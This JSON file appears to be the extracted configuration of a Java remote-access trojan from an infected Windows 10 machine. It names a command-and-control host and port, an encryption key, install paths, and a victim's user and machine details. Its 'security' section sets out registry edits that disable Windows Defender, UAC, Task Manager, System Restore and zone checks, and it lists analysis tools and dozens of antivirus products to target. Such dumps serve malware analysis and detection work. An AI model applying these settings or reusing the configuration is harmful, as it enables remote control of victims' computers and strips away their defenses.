- {
- "serverPath": "C:\\Users\\Larry\\AppData\\Roaming\\mzjipfvdtk.txt",
- "securityRetry": 20,
- "vbox": false,
- "serverVersion": "v1.0.1",
- "mainPath": "C:\\Users\\Larry\\JGMVI",
- "nickName": "BTC",
- "vmware": false,
- "encryptKey": "aitCHKJKhsvedAUApILrTqETU",
- "operatingSystem": {
- "osDefaultArch": "x86",
- "country": {
- "code": "us",
- "name": "United States"
- },
- "antivirus": "Windows Defender, ",
- "icon": "windows10",
- "admin": false,
- "language": "English (United States)",
- "type": 1,
- "processor": 4,
- "osDefaultName": "Windows 10",
- "computerUser": "Larry",
- "javaArchitecture": "x86",
- "computerName": "LARRY-ACCOUNTIN",
- "name": "Windows 10 Enterprise",
- "osDefaultVersion": "10.0",
- "jreVersion": "1.8.0_181",
- "architecture": "amd64",
- "ram": "7 GB"
- },
- "uuid": "6b828d04-e7fe-4f2f-a055-b2dca0699906",
- "command": 1,
- "network": [
- {
- "delay": 2,
- "port": 4083,
- "dns": "humblechrisj.loginto.me"
- }
- ],
- "jrePath": "C:\\Users\\Larry\\Oracle\\bin\\javaw.exe",
- "userTitle": "Larry@LARRY-ACCOUNTIN",
- "security": [
- {
- "code": "open-file-security",
- "reg": [
- {
- "value": "\"SaveZoneInformation\"=dword:00000001\r\n",
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments",
- "valuesCommand": [
- {
- "name": "SaveZoneInformation",
- "valueCommand": "1",
- "valueCommandType": "REG_DWORD",
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments"
- }
- ]
- },
- {
- "value": "\"LowRiskFileTypes\"=\".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;\"\r\n",
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations",
- "valuesCommand": [
- {
- "name": "LowRiskFileTypes",
- "valueCommand": ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;",
- "valueCommandType": "REG_SZ",
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations"
- }
- ]
- },
- {
- "value": "\"SaveZoneInformation\"=\"-\"\r\n",
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments",
- "valuesCommand": [
- {
- "name": "SaveZoneInformation",
- "valueCommand": "-",
- "valueCommandType": "REG_SZ",
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments"
- }
- ]
- },
- {
- "value": "\"LowRiskFileTypes\"=\"-\"\r\n",
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations",
- "valuesCommand": [
- {
- "name": "LowRiskFileTypes",
- "valueCommand": "-",
- "valueCommandType": "REG_SZ",
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations"
- }
- ]
- }
- ],
- "name": {
- "en": "Open-File Security Warning"
- }
- },
- {
- "code": "disable-zone-checking",
- "reg": [
- {
- "value": "\"SEE_MASK_NOZONECHECKS\"=\"1\"\r\n",
- "key": "HKEY_CURRENT_USER\\Environment",
- "valuesCommand": [
- {
- "name": "SEE_MASK_NOZONECHECKS",
- "valueCommand": "1",
- "valueCommandType": "REG_SZ",
- "key": "HKEY_CURRENT_USER\\Environment"
- }
- ]
- },
- {
- "value": "\"SEE_MASK_NOZONECHECKS\"=\"1\"\r\n",
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment",
- "valuesCommand": [
- {
- "name": "SEE_MASK_NOZONECHECKS",
- "valueCommand": "1",
- "valueCommandType": "REG_SZ",
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment"
- }
- ]
- }
- ],
- "name": {
- "en": "Disable Zone Checking"
- }
- },
- {
- "process": [
- "UserAccountControlSettings.exe"
- ],
- "code": "user-account-control",
- "reg": [
- {
- "value": "\"ConsentPromptBehaviorAdmin\"=dword:00000000\r\n\"ConsentPromptBehaviorUser\"=dword:00000000\r\n\"EnableLUA\"=dword:00000000\r\n\"PromptOnSecureDesktop\"=dword:00000000\r\n",
- "key": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
- "valuesCommand": []
- }
- ],
- "name": {
- "en": "User Account Control"
- }
- },
- {
- "process": [
- "Taskmgr.exe"
- ],
- "code": "task-manager",
- "reg": [
- {
- "value": "\"DisableTaskMgr\"=dword:00000002\r\n",
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
- "valuesCommand": [
- {
- "name": "DisableTaskMgr",
- "valueCommand": "2",
- "valueCommandType": "REG_DWORD",
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"
- }
- ]
- }
- ],
- "name": {
- "en": "Task Manager"
- }
- },
- {
- "code": "restore-system",
- "reg": [
- {
- "value": "\"DisableConfig\"=dword:00000001\r\n\"DisableSR\"=dword:00000001\r\n",
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore",
- "valuesCommand": [
- {
- "name": "DisableConfig",
- "valueCommand": "1",
- "valueCommandType": "REG_DWORD",
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore"
- },
- {
- "name": "DisableSR",
- "valueCommand": "1",
- "valueCommandType": "REG_DWORD",
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore"
- }
- ]
- }
- ],
- "name": {
- "en": "Restore System"
- }
- },
- {
- "process": [
- "ProcessHacker.exe"
- ],
- "code": "process-hacker",
- "name": {
- "en": "Process Hacker"
- }
- },
- {
- "process": [
- "procexp.exe"
- ],
- "code": "msconfig",
- "name": {
- "en": "MsConfig"
- }
- },
- {
- "process": [
- "MSASCuiL.exe",
- "MSASCui.exe",
- "MsMpEng.exe",
- "MpUXSrv.exe",
- "MpCmdRun.exe",
- "NisSrv.exe",
- "ConfigSecurityPolicy.exe"
- ],
- "code": "windows-defender",
- "reg": [
- {
- "value": "\"DisableAntiSpyware\"=dword:00000001\r\n",
- "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender",
- "valuesCommand": [
- {
- "name": "DisableAntiSpyware",
- "valueCommand": "1",
- "valueCommandType": "REG_DWORD",
- "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender"
- }
- ]
- },
- {
- "value": "\"DisableBehaviorMonitoring\"=dword:00000001\r\n\"DisableOnAccessProtection\"=dword:00000001\r\n\"DisableScanOnRealtimeEnable\"=dword:00000001\r\n",
- "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
- "valuesCommand": [
- {
- "name": "DisableBehaviorMonitoring",
- "valueCommand": "1",
- "valueCommandType": "REG_DWORD",
- "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
- },
- {
- "name": "DisableOnAccessProtection",
- "valueCommand": "1",
- "valueCommandType": "REG_DWORD",
- "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
- },
- {
- "name": "DisableScanOnRealtimeEnable",
- "valueCommand": "1",
- "valueCommandType": "REG_DWORD",
- "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
- }
- ]
- }
- ],
- "name": {
- "en": "Windows Defender"
- }
- },
- {
- "code": "windows-defender-exclusion",
- "name": {
- "en": "Windows Defender Exclusion"
- }
- },
- {
- "process": [
- "procexp.exe"
- ],
- "code": "process-explorer",
- "name": {
- "en": "Process Explorer"
- }
- },
- {
- "process": [
- "wireshark.exe",
- "tshark.exe",
- "text2pcap.exe",
- "rawshark.exe",
- "dumpcap.exe",
- "capinfos.exe"
- ],
- "code": "wireshark",
- "name": {
- "en": "Wireshark"
- }
- },
- {
- "process": [
- "Procmon.exe"
- ],
- "code": "process-monitor",
- "name": {
- "en": "Process Monitor"
- }
- },
- {
- "code": "avira",
- "name": {
- "en": "Avira"
- }
- },
- {
- "code": "eset",
- "name": {
- "en": "ESET Security"
- }
- },
- {
- "code": "bitdefender",
- "name": {
- "en": "Bitdefender"
- }
- },
- {
- "code": "malwarebytes",
- "name": {
- "en": "MalwareBytes"
- }
- },
- {
- "code": "adware-antivirus",
- "name": {
- "en": "Ad-Aware Antivirus"
- }
- },
- {
- "code": "bull-guard",
- "name": {
- "en": "Bull Guard Antivirus"
- }
- },
- {
- "code": "clamwin",
- "name": {
- "en": "ClamWin Antivirus"
- }
- },
- {
- "code": "comodo",
- "name": {
- "en": "COMODO Antivirus"
- }
- },
- {
- "code": "escan",
- "name": {
- "en": "EScan Antivirus"
- }
- },
- {
- "code": "f-secure",
- "name": {
- "en": "F-Secure Antivirus"
- }
- },
- {
- "code": "f-prot",
- "name": {
- "en": "F-PROT Antivirus"
- }
- },
- {
- "code": "gdata",
- "name": {
- "en": "G DATA Antivirus"
- }
- },
- {
- "code": "ikarus",
- "name": {
- "en": "IKARUS Antivirus"
- }
- },
- {
- "code": "immunet",
- "name": {
- "en": "Immunet Antivirus"
- }
- },
- {
- "code": "k7ultimate",
- "name": {
- "en": "K7 Security"
- }
- },
- {
- "code": "nano",
- "name": {
- "en": "NANO Antivirus"
- }
- },
- {
- "code": "panda",
- "name": {
- "en": "Panda Antivirus"
- }
- },
- {
- "code": "super-anti-spyware",
- "name": {
- "en": "SUPER Anti-Spyware"
- }
- },
- {
- "code": "trend-micro",
- "name": {
- "en": "Trend Micro Antivirus"
- }
- },
- {
- "code": "vipre-security",
- "name": {
- "en": "VIPRE"
- }
- },
- {
- "code": "mcshield",
- "name": {
- "en": "MCShield Anti-Malware Tool"
- }
- },
- {
- "code": "spybot",
- "name": {
- "en": "SPYBOT AntiMalware"
- }
- },
- {
- "code": "forti-client",
- "name": {
- "en": "FortiClient"
- }
- },
- {
- "code": "twister",
- "name": {
- "en": "Twister Antivirus"
- }
- },
- {
- "code": "quickheal",
- "name": {
- "en": "Quick Heal"
- }
- },
- {
- "code": "arcabit",
- "name": {
- "en": "Arcabit"
- }
- },
- {
- "code": "totaldefense",
- "name": {
- "en": "Total Defense"
- }
- },
- {
- "code": "emisoft",
- "name": {
- "en": "Emsisoft Anti-Malware"
- }
- },
- {
- "code": "zillya",
- "name": {
- "en": "Zillya"
- }
- },
- {
- "code": "tachyon",
- "name": {
- "en": "TACHYON"
- }
- },
- {
- "code": "trustport",
- "name": {
- "en": "TrustPort"
- }
- },
- {
- "code": "xvirus",
- "name": {
- "en": "Xvirus"
- }
- }
- ],
- "installDate": {
- "daysRunning": 0,
- "lastModified": 1576685577058
- },
- "installation": {
- "jarName": "YwJnB",
- "moduleFolder": "LLQcu",
- "moduleEntry": "ZgKdOtqwKDcUfsRZplMiNIZkxFWnZCITYRIQnhAneALQalUBbSKiRQTEZnabYjXvgbNikDvt/IuuMMwdSMVnSuTLnLWfJZHVtl/lPrxiOAajrPnmNDnqmSKZEIrZHYFhgESWDWQTMZjlTpjWXlNWebDvoNPUtQYDaUMBDxeJckICJJmRdLbtHlXKIQigeaR.lrQFnaCQPrXFFrlHwFMIxnnIHLTruYFGtsadPfVUcGjAZoJiTkKVwrAWWAGGmOZWKRqVwvc",
- "uniqueIDFile": ".ntusernt.ini",
- "delay": 2,
- "jreFolder": "Oracle",
- "active": true,
- "mainFolder": "JGMVI",
- "moduleExtension": "gGS",
- "jarExtension": "class",
- "jarRegistry": "UgYGDsA"
- },
- "localIp": "172.16.0.2"
- }